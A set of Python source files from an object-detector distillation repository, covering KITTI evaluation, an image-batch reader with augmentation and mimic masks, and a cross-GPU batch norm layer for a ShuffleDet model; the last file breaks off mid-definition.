import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from lib.config import *
from dataset_tool import kitti
from lib.utils.util import bbox_transform, Timer
from lib.models.shuffleDet import ShuffleDet_conv1_stride1, ShuffleDet_conv1_stride1_supervisor
from tensorflow.python import debug as tf_debug
from tensorflow.python.client import timeline
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently support PASCAL_VOC or KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'test',
"""Only used for VOC data."""
"""Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
"""VOC challenge year. 2007 or 2012"""
"""Only used for VOC data""")
tf.app.flags.DEFINE_string('eval_dir', '/home/wangtao/prj/shuffle_sup_shuffle/with_pretrain/eval1',
"""Directory where to write event logs """)
tf.app.flags.DEFINE_string('checkpoint_path', '',
"""Path to the training checkpoint.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 1,
"""How often to check if new cpt is saved.""")
tf.app.flags.DEFINE_boolean('run_once', False,
"""Whether to run eval only once.""")
tf.app.flags.DEFINE_string('net', 'ShuffleDet_conv1_stride1',
"""Neural net architecture.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
tf.app.flags.DEFINE_float('student', 0.5, """student model, 0.5 or 0.25""")
# maintain the max mAP
MAX_MAP = 0.
def eval_once(
saver, ckpt_path, summary_writer, eval_summary_ops, eval_summary_phs, imdb,
model):
global MAX_MAP
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.4)
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=gpu_options)) as sess:
#sess = tf_debug.LocalCLIDebugWrapperSession(sess, dump_root= '/home/wangtao/tfdbg_dump')
# Restores from checkpoint
saver.restore(sess, ckpt_path)
all_vars = tf.global_variables()
for var in all_vars:
if ('mean' in var.name) or ('variance' in var.name):
if sess.run(tf.reduce_sum(tf.cast(tf.equal(var, 0), tf.float32))) >0:
print (var.name)
# Assuming model_checkpoint_path looks something like:
# /ckpt_dir/model.ckpt-0,
# extract global_step from it.
global_step = ckpt_path.split('/')[-1].split('-')[-1]
num_images = len(imdb.image_idx)
all_boxes = [[[] for _ in xrange(num_images)]
for _ in xrange(imdb.num_classes)]
_t = {'im_detect': Timer(), 'im_read': Timer(), 'misc': Timer()}
num_detection = 0.0
for i in xrange(num_images):
_t['im_read'].tic()
images, scales = imdb.read_image_batch(shuffle=False)
_t['im_read'].toc()
_t['im_detect'].tic()
det_bbox, score, det_class = sess.run(
[model.det_bbox_post, model.score_post, model.det_class_post],
feed_dict={model.image_input: images, model.scale_eval: scales})
_t['im_detect'].toc()
num_detection += len(det_bbox)
for c, b, s in zip(det_class, det_bbox, score):
all_boxes[c][i].append(np.hstack([b,s]))
print('im_detect: {:d}/{:d} im_read: {:.3f}s '
'detect: {:.3f}s '.format(
i + 1, num_images, _t['im_read'].average_time,
_t['im_detect'].average_time))
print('Evaluating detections...')
aps, ap_names = imdb.evaluate_detections(
FLAGS.eval_dir, global_step, all_boxes)
print('Evaluation summary:')
print(' Average number of detections per image: {}:'.format(
num_detection / num_images))
print(' Timing:')
print(' im_read: {:.3f}s detect: {:.3f}s misc: {:.3f}s'.format(
_t['im_read'].average_time, _t['im_detect'].average_time,
_t['misc'].average_time))
print(' Average precisions:')
feed_dict = {}
for cls, ap in zip(ap_names, aps):
feed_dict[eval_summary_phs['APs/' + cls]] = ap
print(' {}: {:.3f}'.format(cls, ap))
print(' Mean average precision: {:.3f}'.format(np.mean(aps)))
if np.mean(aps) > MAX_MAP:
MAX_MAP = np.mean(aps)
feed_dict[eval_summary_phs['highest_APs/mAP']] = MAX_MAP
feed_dict[eval_summary_phs['APs/mAP']] = np.mean(aps)
feed_dict[eval_summary_phs['timing/im_detect']] = \
_t['im_detect'].average_time
feed_dict[eval_summary_phs['timing/im_read']] = \
_t['im_read'].average_time
feed_dict[eval_summary_phs['timing/post_proc']] = \
_t['misc'].average_time
feed_dict[eval_summary_phs['num_det_per_image']] = \
num_detection / num_images
print('Analyzing detections...')
stats, ims = imdb.do_detection_analysis_in_eval(
FLAGS.eval_dir, global_step)
eval_summary_str = sess.run(eval_summary_ops, feed_dict=feed_dict)
for sum_str in eval_summary_str:
summary_writer.add_summary(sum_str, global_step)
def evaluate():
"""Evaluate."""
assert FLAGS.dataset == 'KITTI', \
'Currently only supports KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default() as g:
mc = kitti_shuffledet_config()
mc.BATCH_SIZE = 1
mc.LOAD_PRETRAINED_MODEL = False
if FLAGS.net =='ShuffleDet_conv1_stride1_supervisor':
model = ShuffleDet_conv1_stride1_supervisor(mc)
elif FLAGS.net =='ShuffleDet_conv1_stride1':
model = ShuffleDet_conv1_stride1(mc, student=FLAGS.student)
imdb = kitti(FLAGS.image_set, './data/KITTI', mc)
# add summary ops and placeholders
ap_names = []
for cls in imdb.classes:
ap_names.append(cls + '_easy')
ap_names.append(cls + '_medium')
ap_names.append(cls + '_hard')
eval_summary_ops = []
eval_summary_phs = {}
for ap_name in ap_names:
ph = tf.placeholder(tf.float32)
eval_summary_phs['APs/' + ap_name] = ph
eval_summary_ops.append(tf.summary.scalar('APs/' + ap_name, ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['APs/mAP'] = ph
eval_summary_ops.append(tf.summary.scalar('APs/mAP', ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['highest_APs/mAP'] = ph
eval_summary_ops.append(tf.summary.scalar('highest_APs/mAP', ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['timing/im_detect'] = ph
eval_summary_ops.append(tf.summary.scalar('timing/im_detect', ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['timing/im_read'] = ph
eval_summary_ops.append(tf.summary.scalar('timing/im_read', ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['timing/post_proc'] = ph
eval_summary_ops.append(tf.summary.scalar('timing/post_proc', ph))
ph = tf.placeholder(tf.float32)
eval_summary_phs['num_det_per_image'] = ph
eval_summary_ops.append(tf.summary.scalar('num_det_per_image', ph))
if FLAGS.net == 'ShuffleDet_conv1_stride1' or FLAGS.net == 'ShuffleDet_conv1_stride1_supervisor':
gr = tf.global_variables(scope='g')
global_step = tf.global_variables(scope='global')
gr = [item for item in gr if item not in global_step]
c = tf.global_variables(scope='conv1')
add = tf.global_variables(scope='add')
list = gr + c + add
saver = tf.train.Saver(var_list=list)
elif FLAGS.net == 'edet':
full = tf.global_variables()
iou = tf.global_variables(scope='iou')
list = [item for item in full if item not in iou]
saver = tf.train.Saver(var_list=list)
else:
pass
summary_writer = tf.summary.FileWriter(FLAGS.eval_dir, g)
ckpts = set()
while True:
if FLAGS.run_once:
# When run_once is true, checkpoint_path should point to the exact
# checkpoint file.
eval_once(
saver, FLAGS.checkpoint_path, summary_writer, eval_summary_ops,
eval_summary_phs, imdb, model)
return
else:
# When run_once is false, checkpoint_path should point to the directory
# that stores checkpoint files.
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_path)
if ckpt and ckpt.model_checkpoint_path:
if ckpt.model_checkpoint_path in ckpts:
# Do not evaluate on the same checkpoint
print('Wait {:d}s for new checkpoints to be saved ... '
.format(FLAGS.eval_interval_secs))
time.sleep(FLAGS.eval_interval_secs)
else:
ckpts.add(ckpt.model_checkpoint_path)
print('Evaluating {}...'.format(ckpt.model_checkpoint_path))
eval_once(
saver, ckpt.model_checkpoint_path, summary_writer,
eval_summary_ops, eval_summary_phs, imdb, model)
else:
print('No checkpoint file found')
if not FLAGS.run_once:
print('Wait {:d}s for new checkpoints to be saved ... '
.format(FLAGS.eval_interval_secs))
time.sleep(FLAGS.eval_interval_secs)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.eval_dir):
tf.gfile.DeleteRecursively(FLAGS.eval_dir)
tf.gfile.MakeDirs(FLAGS.eval_dir)
evaluate()
if __name__ == '__main__':
tf.app.run()
|
twangnh/Distilling-Object-Detectors-Shuffledet | dataset_tool/imdb.py | import os
import random
import shutil
from PIL import Image, ImageFont, ImageDraw
import cv2
import numpy as np
from lib.utils.util import iou, batch_iou
from augmentation import BrightnessTransform, ContrastTransform, SaturationTransform
class imdb(object):
"""Image database."""
def __init__(self, name, mc):
self._name = name
self._classes = []
self._image_set = []
self._image_idx = []
self._data_root_path = []
self._rois = {}
self.mc = mc
# batch reader
self._perm_idx = None
self._cur_idx = 0
#mimic thresh
self._mimic_trhesh1= 0.5
self._mimic_trhesh2= 0.5
@property
def name(self):
return self._name
@property
def classes(self):
return self._classes
@property
def num_classes(self):
return len(self._classes)
@property
def image_idx(self):
return self._image_idx
@property
def image_set(self):
return self._image_set
@property
def data_root_path(self):
return self._data_root_path
@property
def year(self):
return self._year
def _shuffle_image_idx(self):
self._perm_idx = [self._image_idx[i] for i in
np.random.permutation(np.arange(len(self._image_idx)))]
self._cur_idx = 0
def read_image_batch(self, shuffle=True):
"""Only Read a batch of images
Args:
shuffle: whether or not to shuffle the dataset
Returns:
images: length batch_size list of arrays [height, width, 3]
"""
mc = self.mc
if shuffle:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
self._shuffle_image_idx()
batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
else:
if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
batch_idx = self._image_idx[self._cur_idx:] \
+ self._image_idx[:self._cur_idx + mc.BATCH_SIZE - len(self._image_idx)]
self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
else:
batch_idx = self._image_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
self._cur_idx += mc.BATCH_SIZE
images, scales = [], []
for i in batch_idx:
im = cv2.imread(self._image_path_at(i))
im = im.astype(np.float32, copy=False)
im -= mc.BGR_MEANS
orig_h, orig_w, _ = [float(v) for v in im.shape]
im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
x_scale = mc.IMAGE_WIDTH / orig_w
y_scale = mc.IMAGE_HEIGHT / orig_h
images.append(im)
scales.append((x_scale, y_scale))
return images, scales
# only used for kitti test set output
# def read_image_batch_testset(self, shuffle=True):
#
# def image_path_at(idx):
# image_path = os.path.join('./data/KITTI/testing/image_2', idx)
# assert os.path.exists(image_path), \
# 'Image does not exist: {}'.format(image_path)
# return image_path
#
# mc = self.mc
# if shuffle:
# if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
# self._shuffle_image_idx()
# batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
# self._cur_idx += mc.BATCH_SIZE
# else:
# if self._cur_idx + mc.BATCH_SIZE >= len(self._image_idx):
# batch_idx = self._image_idx[self._cur_idx:] \
# + self._image_idx[:self._cur_idx + mc.BATCH_SIZE - len(self._image_idx)]
# self._cur_idx += mc.BATCH_SIZE - len(self._image_idx)
# else:
# batch_idx = self._image_idx[self._cur_idx:self._cur_idx + mc.BATCH_SIZE]
# self._cur_idx += mc.BATCH_SIZE
#
# images, scales = [], []
# for i in batch_idx:
# im = cv2.imread(image_path_at(i))
# # modify for eval result output
# im_orig = im
# im = im.astype(np.float32, copy=False)
# im -= mc.BGR_MEANS
# orig_h, orig_w, _ = [float(v) for v in im.shape]
# im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
# x_scale = mc.IMAGE_WIDTH / orig_w
# y_scale = mc.IMAGE_HEIGHT / orig_h
# images.append(im)
# scales.append((x_scale, y_scale))
#
# return images, im_orig, scales
def read_batch(self, shuffle=True, batch_size=1):
"""Read a batch of image and bounding box annotations.
Args:
shuffle: whether or not to shuffle the dataset
Returns:
image_per_batch: images. Shape: batch_size x width x height x [b, g, r]
label_per_batch: labels. Shape: batch_size x object_num
delta_per_batch: bounding box deltas. Shape: batch_size x object_num x
[dx ,dy, dw, dh]
aidx_per_batch: index of anchors that are responsible for prediction.
Shape: batch_size x object_num
bbox_per_batch: scaled bounding boxes. Shape: batch_size x object_num x
[cx, cy, w, h]
"""
mc = self.mc
if shuffle:
if self._cur_idx + batch_size >= len(self._image_idx):
self._shuffle_image_idx()
batch_idx = self._perm_idx[self._cur_idx:self._cur_idx + batch_size]
self._cur_idx += batch_size
else:
if self._cur_idx + batch_size >= len(self._image_idx):
batch_idx = self._image_idx[self._cur_idx:] \
+ self._image_idx[:self._cur_idx + batch_size - len(self._image_idx)]
self._cur_idx += batch_size - len(self._image_idx)
else:
batch_idx = self._image_idx[self._cur_idx:self._cur_idx + batch_size]
self._cur_idx += batch_size
image_per_batch = []
label_per_batch = []
bbox_per_batch = []
delta_per_batch = []
aidx_per_batch = []
if mc.DEBUG_MODE:
avg_ious = 0.
num_objects = 0.
max_iou = 0.0
min_iou = 1.0
num_zero_iou_obj = 0
mask_per_batch = np.zeros([len(batch_idx), 24, 78]).astype(bool)
mask_per_batch2 = np.zeros([len(batch_idx), 24, 78, 9]).astype(bool)
for num_idx, idx in enumerate(batch_idx):
# load the image
# im = cv2.imread(self._image_path_at(idx)).astype(np.float32, copy=False)
##Mar 14 add augmentation
im = cv2.imread(self._image_path_at(idx))
im = BrightnessTransform(im)
im = ContrastTransform(im)
im = SaturationTransform(im)
im = im.astype(np.float32, copy=False)
im -= mc.BGR_MEANS
orig_h, orig_w, _ = [float(v) for v in im.shape]
# load annotations
label_per_batch.append([b[4] for b in self._rois[idx][:]])
gt_bbox = np.array([[b[0], b[1], b[2], b[3]] for b in self._rois[idx][:]])
if mc.DATA_AUGMENTATION:
assert mc.DRIFT_X >= 0 and mc.DRIFT_Y > 0, \
'mc.DRIFT_X and mc.DRIFT_Y must be >= 0'
if mc.DRIFT_X > 0 or mc.DRIFT_Y > 0:
# Ensures that gt boundibg box is not cutted out of the image
max_drift_x = min(gt_bbox[:, 0] - gt_bbox[:, 2] / 2.0 + 1)
max_drift_y = min(gt_bbox[:, 1] - gt_bbox[:, 3] / 2.0 + 1)
assert max_drift_x >= 0 and max_drift_y >= 0, 'bbox out of image'
dy = np.random.randint(-mc.DRIFT_Y, min(mc.DRIFT_Y + 1, max_drift_y))
dx = np.random.randint(-mc.DRIFT_X, min(mc.DRIFT_X + 1, max_drift_x))
# shift bbox
gt_bbox[:, 0] = gt_bbox[:, 0] - dx
gt_bbox[:, 1] = gt_bbox[:, 1] - dy
# distort image
orig_h -= dy
orig_w -= dx
orig_x, dist_x = max(dx, 0), max(-dx, 0)
orig_y, dist_y = max(dy, 0), max(-dy, 0)
distorted_im = np.zeros(
(int(orig_h), int(orig_w), 3)).astype(np.float32)
distorted_im[dist_y:, dist_x:, :] = im[orig_y:, orig_x:, :]
im = distorted_im
# Flip image with 50% probability
if np.random.randint(2) > 0.5:
im = im[:, ::-1, :]
gt_bbox[:, 0] = orig_w - 1 - gt_bbox[:, 0]
# scale image
im = cv2.resize(im, (mc.IMAGE_WIDTH, mc.IMAGE_HEIGHT))
image_per_batch.append(im)
# scale annotation
x_scale = mc.IMAGE_WIDTH / orig_w
y_scale = mc.IMAGE_HEIGHT / orig_h
gt_bbox[:, 0::2] = gt_bbox[:, 0::2] * x_scale
gt_bbox[:, 1::2] = gt_bbox[:, 1::2] * y_scale
bbox_per_batch.append(gt_bbox)
aidx_per_image, delta_per_image = [], []
aidx_set = set()
mask_per_img = np.zeros([24, 78])
mask_per_img2 = np.zeros([24, 78, 9])
for i in range(len(gt_bbox)):
overlaps = batch_iou(mc.ANCHOR_BOX, gt_bbox[i])
#############add for mask preparation
##modify for det head mimic
overlaps_temp = np.transpose(np.reshape(overlaps, [24, 78, 9]), [2, 0, 1])
max_overlap_per_gbox = np.max(overlaps_temp)
positive_thresh1 = max_overlap_per_gbox * self._mimic_trhesh1
mask_per_gbox_per_anchor1 = (overlaps_temp > positive_thresh1).astype(int)
# merge all anchor mask, for last feature mimic
mask_per_gbox = mask_per_gbox_per_anchor1[0]
for anchor_inx in range(len(overlaps_temp)):
mask_per_gbox += mask_per_gbox_per_anchor1[anchor_inx]
# modify for gt box supervison
mask_per_img += mask_per_gbox
# x = int(gt_bbox[i][0]//16)
# y = int(gt_bbox[i][1]//16)
# w = int(gt_bbox[i][2]//16)
# h = int(gt_bbox[i][3]//16)
#
# mask_per_img[(y-h//2):y+(h//2), (x-w//2):x+(w//2)] +=1
# for det head mimic
positive_thresh2 = max_overlap_per_gbox * self._mimic_trhesh2
# [24, 78, 9]
mask_per_gbox_per_anchor2 = (np.reshape(overlaps, [24, 78, 9]) > positive_thresh2) \
.astype(int)
mask_per_img2 += mask_per_gbox_per_anchor2
# overlaps_batch.append(np.transpose(np.reshape(overlaps,[12,35,9]),[2,0,1]))
aidx = len(mc.ANCHOR_BOX)
for ov_idx in np.argsort(overlaps)[::-1]:
if overlaps[ov_idx] <= 0:
if mc.DEBUG_MODE:
min_iou = min(overlaps[ov_idx], min_iou)
num_objects += 1
num_zero_iou_obj += 1
break
if ov_idx not in aidx_set:
aidx_set.add(ov_idx)
aidx = ov_idx
if mc.DEBUG_MODE:
max_iou = max(overlaps[ov_idx], max_iou)
min_iou = min(overlaps[ov_idx], min_iou)
avg_ious += overlaps[ov_idx]
num_objects += 1
break
if aidx == len(mc.ANCHOR_BOX):
# even the largeset available overlap is 0, thus, choose one with the
# smallest square distance
dist = np.sum(np.square(gt_bbox[i] - mc.ANCHOR_BOX), axis=1)
for dist_idx in np.argsort(dist):
if dist_idx not in aidx_set:
aidx_set.add(dist_idx)
aidx = dist_idx
break
box_cx, box_cy, box_w, box_h = gt_bbox[i]
delta = [0] * 4
delta[0] = (box_cx - mc.ANCHOR_BOX[aidx][0]) / mc.ANCHOR_BOX[aidx][2]
delta[1] = (box_cy - mc.ANCHOR_BOX[aidx][1]) / mc.ANCHOR_BOX[aidx][3]
delta[2] = np.log(box_w / mc.ANCHOR_BOX[aidx][2])
delta[3] = np.log(box_h / mc.ANCHOR_BOX[aidx][3])
aidx_per_image.append(aidx)
delta_per_image.append(delta)
mask_per_batch[num_idx] = mask_per_img > 0
mask_per_batch2[num_idx] = mask_per_img2 > 0
delta_per_batch.append(delta_per_image)
aidx_per_batch.append(aidx_per_image)
if mc.DEBUG_MODE:
print ('max iou: {}'.format(max_iou))
print ('min iou: {}'.format(min_iou))
print ('avg iou: {}'.format(avg_ious / num_objects))
print ('number of objects: {}'.format(num_objects))
print ('number of objects with 0 iou: {}'.format(num_zero_iou_obj))
return image_per_batch, label_per_batch, delta_per_batch, \
aidx_per_batch, bbox_per_batch, mask_per_batch, mask_per_batch2
def load_images_and_encode_target(self):
def sparse_to_dense(sp_indices, output_shape, values, default_value=0):
"""Build a dense matrix from sparse representations.
Args:
sp_indices: A [0-2]-D array that contains the index to place values.
shape: shape of the dense matrix.
values: A {0,1}-D array where values corresponds to the index in each row of
sp_indices.
default_value: values to set for indices not specified in sp_indices.
Return:
A dense numpy N-D array with shape output_shape.
"""
assert len(sp_indices) == len(values), \
'Length of sp_indices is not equal to length of values'
array = np.ones(output_shape) * default_value
for idx, value in zip(sp_indices, values):
array[tuple(idx)] = value
return array
image_per_batch, label_per_batch, box_delta_per_batch, aidx_per_batch, \
bbox_per_batch, mask_per_batch, mask_per_batch2 = self.read_batch()
label_indices, bbox_indices, box_delta_values, mask_indices, box_values, \
= [], [], [], [], []
aidx_set = set()
num_discarded_labels = 0
num_labels = 0
for i in range(len(label_per_batch)): # batch_size
for j in range(len(label_per_batch[i])): # number of annotations
num_labels += 1
if (i, aidx_per_batch[i][j]) not in aidx_set:
aidx_set.add((i, aidx_per_batch[i][j]))
label_indices.append(
[i, aidx_per_batch[i][j], label_per_batch[i][j]])
mask_indices.append([i, aidx_per_batch[i][j]])
bbox_indices.extend(
[[i, aidx_per_batch[i][j], k] for k in range(4)])
box_delta_values.extend(box_delta_per_batch[i][j])
box_values.extend(bbox_per_batch[i][j])
else:
num_discarded_labels += 1
image_input = image_per_batch,
input_mask = np.reshape(
sparse_to_dense(
mask_indices, [1, self.mc.ANCHORS],
[1.0] * len(mask_indices)),
[1, self.mc.ANCHORS, 1]),
box_delta_input= sparse_to_dense(
bbox_indices, [1, self.mc.ANCHORS, 4],
box_delta_values),
box_input= sparse_to_dense(
bbox_indices, [1, self.mc.ANCHORS, 4],
box_values),
labels= sparse_to_dense(
label_indices,
[1, self.mc.ANCHORS, self.mc.CLASSES],
[1.0] * len(label_indices)),
return image_input[0],input_mask[0],box_delta_input[0],box_input[0],labels[0], mask_per_batch, mask_per_batch2
def next_batch(self):
while True:
image_input, input_mask, box_delta_input, box_input, labels, mask_per_batch, mask_per_batch2 = self.load_images_and_encode_target()
yield (image_input, input_mask, box_delta_input, box_input, labels, mask_per_batch, mask_per_batch2)
def evaluate_detections(self):
raise NotImplementedError
def visualize_detections(
self, image_dir, image_format, det_error_file, output_image_dir,
num_det_per_type=10):
# load detections
with open(det_error_file) as f:
lines = f.readlines()
random.shuffle(lines)
f.close()
dets_per_type = {}
for line in lines:
obj = line.strip().split(' ')
error_type = obj[1]
if error_type not in dets_per_type:
dets_per_type[error_type] = [{
'im_idx': obj[0],
'bbox': [float(obj[2]), float(obj[3]), float(obj[4]), float(obj[5])],
'class': obj[6],
'score': float(obj[7])
}]
else:
dets_per_type[error_type].append({
'im_idx': obj[0],
'bbox': [float(obj[2]), float(obj[3]), float(obj[4]), float(obj[5])],
'class': obj[6],
'score': float(obj[7])
})
out_ims = []
# Randomly select some detections and plot them
COLOR = (200, 200, 0)
for error_type, dets in dets_per_type.iteritems():
det_im_dir = os.path.join(output_image_dir, error_type)
if os.path.exists(det_im_dir):
shutil.rmtree(det_im_dir)
os.makedirs(det_im_dir)
for i in range(min(num_det_per_type, len(dets))):
det = dets[i]
im = Image.open(
os.path.join(image_dir, det['im_idx'] + image_format))
draw = ImageDraw.Draw(im)
draw.rectangle(det['bbox'], outline=COLOR)
draw.text((det['bbox'][0], det['bbox'][1]),
'{:s} ({:.2f})'.format(det['class'], det['score']),
fill=COLOR)
out_im_path = os.path.join(det_im_dir, str(i) + image_format)
im.save(out_im_path)
im = np.array(im)
out_ims.append(im[:, :, ::-1]) # RGB to BGR
return out_ims
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/models/cross_gpu_bn.py | # -*- coding: utf-8 -*-
# File: batch_norm.py
import re
import six
import tensorflow as tf
from tensorflow.contrib.framework import add_model_variable
from tensorflow.python.training import moving_averages
import logging
logging.getLogger().level = logging.INFO
from tensorflow.contrib.framework import add_arg_scope
from tensorpack.models.registry import layer_register
__all__ = ['c_batch_norm']
def get_bn_variables(n_out, use_scale, use_bias, beta_init, gamma_init):
if use_bias:
beta = tf.get_variable('beta', [n_out], initializer=beta_init)
else:
beta = tf.zeros([n_out], name='beta')
if use_scale:
gamma = tf.get_variable('gamma', [n_out], initializer=gamma_init)
else:
gamma = tf.ones([n_out], name='gamma')
# x * gamma + beta
moving_mean = tf.get_variable('mean/EMA', [n_out],
initializer=tf.constant_initializer(), trainable=False)
moving_var = tf.get_variable('variance/EMA', [n_out],
initializer=tf.constant_initializer(1.0), trainable=False)
return beta, gamma, moving_mean, moving_var
def update_bn_ema(xn, batch_mean, batch_var,
moving_mean, moving_var, decay, internal_update):
with tf.device('/cpu:0'):
update_op1 = moving_averages.assign_moving_average(
moving_mean, batch_mean, decay, zero_debias=False,
name='mean_ema_op')
update_op2 = moving_averages.assign_moving_average(
moving_var, batch_var, decay, zero_debias=False,
name='var_ema_op')
if internal_update:
with tf.control_dependencies([update_op1, update_op2]):
return tf.identity(xn, name='output')
else:
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_op1)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, update_op2)
return tf.identity(xn, name='output')
@layer_register(log_shape=True)
def c_batch_norm(inputs, scope, training=None, is_main_training_tower=True, axis=None,
momentum=0.9, epsilon=1e-5,
center=True, scale=True,
beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
virtual_batch_size=None,
data_format='NCHW',
internal_update=False,
sync_statistics='nccl'):
"""
Almost equivalent to `tf.layers.batch_normalization`, but different (and more powerful)
in the following:
1. Accepts an alternative `data_format` option when `axis` is None. For 2D input, this argument will be ignored.
2. Default value for `momentum` and `epsilon` is different.
3. Default value for `training` is automatically obtained from tensorpack's `TowerContext`, but can be overwritten.
4. Support the `internal_update` option, which enables the use of BatchNorm layer inside conditionals.
5. Support the `sync_statistics` option, which is very useful in small-batch models.
Args:
internal_update (bool): if False, add EMA update ops to
`tf.GraphKeys.UPDATE_OPS`. If True, update EMA inside the layer
by control dependencies.
They are very similar in speed, but `internal_update=True` can be used
when you have conditionals in your model, or when you have multiple networks to train.
sync_statistics: either None or "nccl". By default (None), it uses statistics of the input tensor to normalize.
When set to "nccl", this layer must be used under tensorpack multi-gpu trainers,
and it then uses per-machine (multiple GPU) statistics to normalize.
This option has no effect when not training.
The option is also known as "Cross-GPU BatchNorm" as mentioned in https://arxiv.org/abs/1711.07240.
Variable Names:
* ``beta``: the bias term. Will be zero-inited by default.
* ``gamma``: the scale term. Will be one-inited by default. Input will be transformed by ``x * gamma + beta``.
* ``mean/EMA``: the moving average of mean.
* ``variance/EMA``: the moving average of variance.
Note:
1. Combinations of ``training`` and ``ctx.is_training``:
* ``training == ctx.is_training``: standard BN, EMA are
maintained during training and used during inference. This is
the default.
* ``training and not ctx.is_training``: still use batch statistics in inference.
* ``not training and ctx.is_training``: use EMA to normalize in
training. This is useful when you load a pre-trained BN and
don't want to fine tune the EMA. EMA will not be updated in
this case.
"""
# parse shapes
shape = inputs.get_shape().as_list()
ndims = len(shape)
assert ndims in [2, 4], ndims
if sync_statistics is not None:
sync_statistics = sync_statistics.lower()
assert sync_statistics in [None, 'nccl', 'horovod'], sync_statistics
if axis is None:
if ndims == 2:
data_format = 'NHWC'
axis = 1
else:
axis = 1 if data_format == 'NCHW' else 3
else:
data_format = 'NCHW' if axis == 1 else 'NHWC'
num_chan = shape[axis]
if sync_statistics is None:
raise ValueError
else:
red_axis = [0] if ndims == 2 else ([0, 2, 3] if axis == 1 else [0, 1, 2])
new_shape = None
if ndims == 4 and axis == 1:
new_shape = [1, num_chan, 1, 1]
batch_mean = tf.reduce_mean(inputs, axis=red_axis)
batch_mean_square = tf.reduce_mean(tf.square(inputs), axis=red_axis)
# for debuging cgbn
# tower_number = is_main_training_tower
#is_main_training_tower = (is_main_training_tower == 0)
# batch_mean =tf.Print(batch_mean, [batch_mean], 'batch_norm_mean %s' %tower_number)
# batch_mean_square =tf.Print(batch_mean_square, [batch_mean_square], 'batch_norm_var %s' %tower_number)
if sync_statistics == 'nccl':
if six.PY3 and is_main_training_tower:
logging.warn("A TensorFlow bug will cause cross-GPU BatchNorm to fail. "
"Apply this patch: https://github.com/tensorflow/tensorflow/pull/20360")
from tensorflow.contrib.nccl.ops import gen_nccl_ops
with tf.variable_scope(scope):
shared_name = re.sub('tower[0-9]+/', '', tf.get_variable_scope().name)
num_dev = 4
batch_mean = gen_nccl_ops.nccl_all_reduce(
input=batch_mean,
reduction='sum',
num_devices=num_dev,
shared_name=shared_name + '_NCCL_mean') * (1.0 / num_dev)
batch_mean_square = gen_nccl_ops.nccl_all_reduce(
input=batch_mean_square,
reduction='sum',
num_devices=num_dev,
shared_name=shared_name + '_NCCL_mean_square') * (1.0 / num_dev)
# if is_main_training_tower:
# batch_mean=tf.Print(batch_mean, [batch_mean], 'batch_norm_mean' )
# batch_mean_square =tf.Print(batch_mean_square, [batch_mean_square], 'batch_norm_var')
elif sync_statistics == 'horovod':
# Require https://github.com/uber/horovod/pull/331
# Proof-of-concept, not ready yet.
import horovod.tensorflow as hvd
batch_mean = hvd.allreduce(batch_mean, average=True)
batch_mean_square = hvd.allreduce(batch_mean_square, average=True)
batch_var = batch_mean_square - tf.square(batch_mean)
batch_mean_vec = batch_mean
batch_var_vec = batch_var
beta, gamma, moving_mean, moving_var = get_bn_variables(
num_chan, scale, center, beta_initializer, gamma_initializer)
if new_shape is not None:
batch_mean = tf.reshape(batch_mean, new_shape)
batch_var = tf.reshape(batch_var, new_shape)
r_gamma = tf.reshape(gamma, new_shape)
r_beta = tf.reshape(beta, new_shape)
else:
r_gamma, r_beta = gamma, beta
xn = tf.nn.batch_normalization(
inputs, batch_mean, batch_var, r_beta, r_gamma, epsilon)
if is_main_training_tower:
ret = update_bn_ema(
xn, batch_mean_vec, batch_var_vec, moving_mean, moving_var,
momentum, internal_update)
else:
ret = tf.identity(xn, name='output')
return ret
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/config/__init__.py | from kitti_shuffledet_config import kitti_shuffledet_config
|
twangnh/Distilling-Object-Detectors-Shuffledet | lib/models/shuffleDet_sup.py | <reponame>twangnh/Distilling-Object-Detectors-Shuffledet<filename>lib/models/shuffleDet_sup.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from lib.models.nn_skeleton import ModelSkeleton
# import tensorpack.models
from tensorpack.models.batch_norm import BatchNorm
from tensorpack.models.conv2d import Conv2D
from tensorpack.models.pool import MaxPooling, GlobalAvgPooling
from tensorpack.models.registry import layer_register
from tensorpack.tfutils import argscope
from tensorpack.tfutils.scope_utils import under_name_scope
from tensorpack.models.pool import AvgPooling
from tensorpack.models.nonlin import BNReLU
from tensorpack.tfutils.tower import TowerContext
from lib.models.cross_gpu_bn import c_batch_norm
@layer_register(log_shape=True)
def DepthConv(x, out_channel, kernel_shape, padding='SAME', stride=1,
W_init=None, nl=tf.identity):
